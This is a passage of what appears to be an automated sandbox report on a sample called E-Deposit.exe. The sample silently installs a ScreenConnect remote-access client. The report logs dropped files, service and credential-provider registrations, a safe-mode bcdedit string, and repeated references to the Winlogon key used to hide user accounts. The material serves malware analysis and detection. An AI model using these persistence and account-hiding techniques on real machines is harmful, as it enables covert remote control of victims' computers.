                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD941F push esp; retn 0003h8_2_03BD942A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD9477 push ebp; retn 0003h8_2_03BD9482
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF8489E096D push ebx; retf 9_2_00007FF8489E098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF8489E22B1 push ebx; retf 9_2_00007FF8489E22FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF8489E08CD push ebx; retf 9_2_00007FF8489E098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848CE5E71 push FFFFFFB8h; iretd 9_2_00007FF848CE62E4
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848CE5939 pushfd ; retf 9_2_00007FF848CE5991
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848CE6299 push FFFFFFB8h; iretd 9_2_00007FF848CE62E4

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8F8F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI89E1.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8F8F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI89E1.tmpJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: E-Deposit.exe, 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: E-Deposit.exe, 00000000.00000002.2029985839.0000000005960000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000005.00000003.2027178364.000000000508A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3285086355.000000001B5C2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3284914571.000000001B580000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3288878492.000000001B852000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3269847777.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: E-Deposit.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
